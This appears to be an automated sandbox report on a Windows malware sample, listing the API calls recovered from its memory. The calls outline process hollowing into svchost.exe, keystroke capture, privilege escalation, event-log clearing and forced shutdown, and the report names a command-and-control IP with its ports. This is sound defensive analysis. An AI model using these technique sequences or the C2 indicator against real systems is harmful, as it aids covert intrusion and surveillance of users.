                                                                                                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 03627F65
                                                                                                                            • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 03627F92
                                                                                                                            • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00003000,00000040), ref: 03627FAA
                                                                                                                            • GetThreadContext.KERNEL32(?,?,?,00000000,?,00003000,00000040), ref: 03627FCC
                                                                                                                            • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,00003000,00000040), ref: 03627FEA
                                                                                                                            • ResumeThread.KERNEL32(?,?,00000000,?,00003000,00000040), ref: 03627FFF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                                                                            • String ID: %s%s$D$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                                                                                                            • API String ID: 2170139861-2473635271
                                                                                                                            APIs
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,03650D80,74DEE010,74DF2FA0,74DF0F00,?,03626028,?,?), ref: 0362E519
                                                                                                                            • lstrcatW.KERNEL32(03650D80,\DisplaySessionContainers.log,?,03626028,?,?), ref: 0362E529
                                                                                                                            • CreateMutexW.KERNEL32(00000000,00000000,03650D80,?,03626028,?,?), ref: 0362E538
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,03626028,?,?), ref: 0362E546
                                                                                                                            • CreateFileW.KERNEL32(03650D80,40000000,00000002,00000000,00000004,00000080,00000000,?,03626028,?,?), ref: 0362E563
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,03626028,?,?), ref: 0362E56E
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,03626028,?,?), ref: 0362E577
                                                                                                                            • DeleteFileW.KERNEL32(03650D80,?,03626028,?,?), ref: 0362E58A
                                                                                                                            • ReleaseMutex.KERNEL32(00000000,?,03626028,?,?), ref: 0362E597
                                                                                                                            • DirectInput8Create.DINPUT8(?,00000800,03644934,03651220,00000000,?,03626028,?,?), ref: 0362E5B2
                                                                                                                            • GetTickCount.KERNEL32 ref: 0362E665
                                                                                                                            • GetKeyState.USER32(00000014), ref: 0362E672
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile$Mutex$CloseCountDeleteDirectFolderHandleInput8ObjectPathReleaseSingleSizeStateTickWaitlstrcat
                                                                                                                            • String ID: <$\DisplaySessionContainers.log
                                                                                                                            • API String ID: 1095970075-1170057892
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,?,?,?,0362DFA4), ref: 03627637
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,0362DFA4), ref: 0362763E
                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0362765A
                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03627677
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 03627681
                                                                                                                            • GetModuleHandleA.KERNEL32(NtDll.dll,NtSetInformationProcess,?,?,?,?,?,?,?,0362DFA4), ref: 03627691
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 03627698
                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 036276BA
                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 036276C7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CurrentHandleOpenToken$AddressAdjustCloseLookupModulePrivilegePrivilegesProcValue
                                                                                                                            • String ID: NtDll.dll$NtSetInformationProcess$SeDebugPrivilege
                                                                                                                            • API String ID: 1802016953-1577477132
                                                                                                                            APIs
                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 03630576
                                                                                                                            • GetSystemInfo.KERNEL32(?), ref: 0363058E
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0363059E
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 036305AE
                                                                                                                            • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004), ref: 03630600
                                                                                                                            • VirtualProtect.KERNEL32(?,-00000001,00000104,?), ref: 03630615
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AddressAllocHandleInfoModuleProcProtectQuerySystem
                                                                                                                            • String ID: SetThreadStackGuarantee$kernel32.dll
                                                                                                                            • API String ID: 3290314748-423161677
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 03627B89
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 03627B90
                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03627BB6
                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03627BCC
                                                                                                                            • GetLastError.KERNEL32 ref: 03627BD2
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 03627BE0
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 03627BFB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                            • API String ID: 3435690185-3733053543
                                                                                                                            APIs
                                                                                                                            • OpenEventLogW.ADVAPI32(00000000,036458BC), ref: 0362B3E7
                                                                                                                            • ClearEventLogW.ADVAPI32(00000000,00000000), ref: 0362B3F2
                                                                                                                            • CloseEventLog.ADVAPI32(00000000), ref: 0362B3F9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Event$ClearCloseOpen
                                                                                                                            • String ID: Application$Security$System
                                                                                                                            • API String ID: 1391105993-2169399579
                                                                                                                            • Opcode ID: 26024555e6537c3753beb1f6dbda5956fff5b548f172f2c0b425c45cce36ab15
                                                                                                                            • Instruction ID: 75331c152f8e991773cce0827db6f6be1aa2136c5539e898e8f209fd98a6cd83
                                                                                                                            • Opcode Fuzzy Hash: 26024555e6537c3753beb1f6dbda5956fff5b548f172f2c0b425c45cce36ab15
                                                                                                                            • Instruction Fuzzy Hash: B8E0E536E056344BC321EF05A844B1EF7D0FBC9705F14050DFA4897208CB3088058B99
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_34a0000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: swprintf$_memset
                                                                                                                            • String ID: :$@
                                                                                                                            • API String ID: 1292703666-1367939426
                                                                                                                            • Opcode ID: 3ce09b44c703f379a6cffab786f078c12705430181853880a2577985a84515e9
                                                                                                                            • Instruction ID: 09de9276c0957a53905a2c2dace81922c5995f33e9abbcaaf9a9dcdb30eaba2c
                                                                                                                            • Opcode Fuzzy Hash: 3ce09b44c703f379a6cffab786f078c12705430181853880a2577985a84515e9
                                                                                                                            • Instruction Fuzzy Hash: 15315EB6D0021CABDB14CBE9CC85FEEB7B9FB88300F50421DE91AAB241E6746945CB54
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,036278FC), ref: 03627756
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,036278FC,?,?,?,?,?,?,74DF0630), ref: 0362775D
                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 03627785
                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 036277B9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                            • String ID: SeDebugPrivilege
                                                                                                                            • API String ID: 2349140579-2896544425
                                                                                                                            • Opcode ID: b28758308e883eaac73a2fe2a46f9584d35ee9c252653fa3c5fa49d26e844812
                                                                                                                            • Instruction ID: eef930736945958d4fff36e366350628296cde5971057490c3c753ff5fc42d8b
                                                                                                                            • Opcode Fuzzy Hash: b28758308e883eaac73a2fe2a46f9584d35ee9c252653fa3c5fa49d26e844812
                                                                                                                            • Instruction Fuzzy Hash: 6A118E74E40208ABDB00DFE5C81AFAEBBB4EF08B00F108558F505AB284DBB5A904CB60
                                                                                                                            APIs
                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 02C3793D
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02C37952
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(02C45350), ref: 02C3795D
                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 02C37979
                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 02C37980
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2579439406-0
                                                                                                                            • Opcode ID: 782dc9429c1d0d8736a732dc5be5bb60c7c404e1d7bf224ae61bc345cd3d7ad5
                                                                                                                            • Instruction ID: 88d2bfadb9cd8240b5fa6478a670b798c85b6adc1b6eafde63e82f442a1bd429
                                                                                                                            • Opcode Fuzzy Hash: 782dc9429c1d0d8736a732dc5be5bb60c7c404e1d7bf224ae61bc345cd3d7ad5
                                                                                                                            • Instruction Fuzzy Hash: C421D2BCCC4A04DFE782DF68E56975B3BE5BB08395F401A19E50987240EBB656A0CF05
                                                                                                                            APIs
                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 0363131C
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03631331
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(036425B8), ref: 0363133C
                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 03631358
                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 0363135F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2579439406-0
                                                                                                                            • Opcode ID: c2e781d9a8238eb99f1115241ee3dd9c473007c27d9b8fc0575ad04d77667438
                                                                                                                            • Instruction ID: 2a3e7c88f38b8100c2b03e5be47ac683bb09930196fde501d2d580641bba41ea
                                                                                                                            • Opcode Fuzzy Hash: c2e781d9a8238eb99f1115241ee3dd9c473007c27d9b8fc0575ad04d77667438
                                                                                                                            • Instruction Fuzzy Hash: 5621BEBDD84244DFD740FF28F15564A3BB4BB0A300F60A45AE9088B38CEBB09580CF59
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 03627B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 03627B89
                                                                                                                              • Part of subcall function 03627B70: OpenProcessToken.ADVAPI32(00000000), ref: 03627B90
                                                                                                                              • Part of subcall function 03627B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03627BB6
                                                                                                                              • Part of subcall function 03627B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03627BCC
                                                                                                                              • Part of subcall function 03627B70: GetLastError.KERNEL32 ref: 03627BD2
                                                                                                                              • Part of subcall function 03627B70: CloseHandle.KERNEL32(?), ref: 03627BE0
                                                                                                                            • ExitWindowsEx.USER32(00000005,00000000), ref: 0362B471
                                                                                                                              • Part of subcall function 03627B70: CloseHandle.KERNEL32(?), ref: 03627BFB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 681424410-0
                                                                                                                            • Opcode ID: 75aa0f3eec270cb076438a2e4985a75a6e1711fdaa80a351f9c765dcc6c1b66d
                                                                                                                            • Instruction ID: de239f0215da89d307f200eeb561be070257ed86f383a611e6368e6eb3aabdfd
                                                                                                                            • Opcode Fuzzy Hash: 75aa0f3eec270cb076438a2e4985a75a6e1711fdaa80a351f9c765dcc6c1b66d
                                                                                                                            • Instruction Fuzzy Hash: B7C08C3B34061002D214BAB47822F6ABB60DB84723F12042FB70A8C0C14C52849009AA
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 03627B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 03627B89
                                                                                                                              • Part of subcall function 03627B70: OpenProcessToken.ADVAPI32(00000000), ref: 03627B90
                                                                                                                              • Part of subcall function 03627B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03627BB6
                                                                                                                              • Part of subcall function 03627B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03627BCC
                                                                                                                              • Part of subcall function 03627B70: GetLastError.KERNEL32 ref: 03627BD2
                                                                                                                              • Part of subcall function 03627B70: CloseHandle.KERNEL32(?), ref: 03627BE0
                                                                                                                            • ExitWindowsEx.USER32(00000006,00000000), ref: 0362B44D
                                                                                                                              • Part of subcall function 03627B70: CloseHandle.KERNEL32(?), ref: 03627BFB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 681424410-0
                                                                                                                            • Opcode ID: cddf6617c7e98b05f9dd0f350ec784ad3695c20eb16f7506ab22ae6da55fa71b
                                                                                                                            • Instruction ID: 13a682d045f739dc4a74b0c084f01f7c607efea1f1719833db43e2c6feeea7ca
                                                                                                                            • Opcode Fuzzy Hash: cddf6617c7e98b05f9dd0f350ec784ad3695c20eb16f7506ab22ae6da55fa71b
                                                                                                                            • Instruction Fuzzy Hash: 03C08C3B34021002D214BAB47822F6ABB60DB84723F11042FB60A8C0C14C5384A045AA
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 03627B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 03627B89
                                                                                                                              • Part of subcall function 03627B70: OpenProcessToken.ADVAPI32(00000000), ref: 03627B90
                                                                                                                              • Part of subcall function 03627B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03627BB6
                                                                                                                              • Part of subcall function 03627B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03627BCC
                                                                                                                              • Part of subcall function 03627B70: GetLastError.KERNEL32 ref: 03627BD2
                                                                                                                              • Part of subcall function 03627B70: CloseHandle.KERNEL32(?), ref: 03627BE0
                                                                                                                            • ExitWindowsEx.USER32(00000004,00000000), ref: 0362B429
                                                                                                                              • Part of subcall function 03627B70: CloseHandle.KERNEL32(?), ref: 03627BFB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 681424410-0
                                                                                                                            • Opcode ID: d9a3ad1435c7ee042422ad883ad53eff1b207d78f5359b66127eb7430e29a4d6
                                                                                                                            • Instruction ID: 73e06eef1a5cd094be5a142b9a9d23bbdc6143c11a65a1739e4f85b6f3cf0c46
                                                                                                                            • Opcode Fuzzy Hash: d9a3ad1435c7ee042422ad883ad53eff1b207d78f5359b66127eb7430e29a4d6
                                                                                                                            • Instruction Fuzzy Hash: 08C08C3B34021006D214BBB47822F69BB60DB84723F11042FB70A8C0C14C62849005AE
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0362F707: _malloc.LIBCMT ref: 0362F721
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002,?), ref: 0362B586
                                                                                                                            • RegDeleteValueW.ADVAPI32(?,IpDate), ref: 0362B596
                                                                                                                            • RegSetValueExW.ADVAPI32(?,IpDate,00000000,00000003,00000002,?), ref: 0362B5B3
                                                                                                                            • _memset.LIBCMT ref: 0362B5D4
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0362B61B
                                                                                                                            • _memset.LIBCMT ref: 0362B63C
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0362B72C
                                                                                                                            • Sleep.KERNEL32(000007D0), ref: 0362B737
                                                                                                                              • Part of subcall function 0362F707: std::exception::exception.LIBCMT ref: 0362F756
                                                                                                                              • Part of subcall function 0362F707: std::exception::exception.LIBCMT ref: 0362F770
                                                                                                                              • Part of subcall function 0362F707: __CxxThrowException@8.LIBCMT ref: 0362F781
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseValue_memsetstd::exception::exception$DeleteException@8OpenSleepThrow_malloc
                                                                                                                            • String ID: 118.107.44.219$118.107.44.219$118.107.44.219$19091$19092$19093$Console$IpDate$o1:$o2:$o3:$p1:$p2:$p3:$t1:$t2:$t3:
                                                                                                                            • API String ID: 1186799303-3661167401
                                                                                                                            • Opcode ID: e4dc142ad7cfbf6b1463962197dee7cdfa33dfcf03bb4966a3f7a80ffbb89610
                                                                                                                            • Instruction ID: 9f5fc54357c2889c02567e16522bcd37d4783ff18f77d20ad8ea9c766931e300
                                                                                                                            • Opcode Fuzzy Hash: e4dc142ad7cfbf6b1463962197dee7cdfa33dfcf03bb4966a3f7a80ffbb89610
                                                                                                                            • Instruction Fuzzy Hash: 1741E479F807207FE310FA109C47F6E7764AF46B10F144018FA157E287EAE5E9158AAE
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,02C375E2,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C39ACE
                                                                                                                            • __mtterm.LIBCMT ref: 02C39ADA
                                                                                                                              • Part of subcall function 02C397A5: DecodePointer.KERNEL32(00000008,02C376A5,02C3768B,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C397B6
                                                                                                                              • Part of subcall function 02C397A5: TlsFree.KERNEL32(00000025,02C376A5,02C3768B,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C397D0
                                                                                                                              • Part of subcall function 02C397A5: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,02C376A5,02C3768B,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C3C031
                                                                                                                              • Part of subcall function 02C397A5: _free.LIBCMT ref: 02C3C034
                                                                                                                              • Part of subcall function 02C397A5: DeleteCriticalSection.KERNEL32(00000025,?,?,02C376A5,02C3768B,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C3C05B
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02C39AF0
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02C39AFD
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02C39B0A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02C39B17
                                                                                                                            • TlsAlloc.KERNEL32(?,?,02C375E2,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C39B67
                                                                                                                            • TlsSetValue.KERNEL32(00000000,?,?,02C375E2,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C39B82
                                                                                                                            • __init_pointers.LIBCMT ref: 02C39B8C
                                                                                                                            • EncodePointer.KERNEL32(?,?,02C375E2,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C39B9D
                                                                                                                            • EncodePointer.KERNEL32(?,?,02C375E2,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C39BAA
                                                                                                                            • EncodePointer.KERNEL32(?,?,02C375E2,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C39BB7
                                                                                                                            • EncodePointer.KERNEL32(?,?,02C375E2,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C39BC4
                                                                                                                            • DecodePointer.KERNEL32(Function_00009929,?,?,02C375E2,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C39BE5
                                                                                                                            • __calloc_crt.LIBCMT ref: 02C39BFA
                                                                                                                            • DecodePointer.KERNEL32(00000000,?,?,02C375E2,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C39C14
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C39C26
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                            • API String ID: 3698121176-3819984048
                                                                                                                            • Opcode ID: 6badf9945adb59d26cb32e70c4ae8c195e915ef91063f0c657fa46aef539f71e
                                                                                                                            • Instruction ID: cc731ae3d860bc6ef506df1bbbfcf91df44fc54147c975cbb4354492e668e089
                                                                                                                            • Opcode Fuzzy Hash: 6badf9945adb59d26cb32e70c4ae8c195e915ef91063f0c657fa46aef539f71e
                                                                                                                            • Instruction Fuzzy Hash: 06316239DC02159FD7226F78AC4871BFBE5AB953A8B540F26E404D3190DBB5C861EF50
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,03630FC1,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 0363401C
                                                                                                                            • __mtterm.LIBCMT ref: 03634028
                                                                                                                              • Part of subcall function 03633CF1: DecodePointer.KERNEL32(00000009,03631084,0363106A,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 03633D02
                                                                                                                              • Part of subcall function 03633CF1: TlsFree.KERNEL32(00000027,03631084,0363106A,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 03633D1C
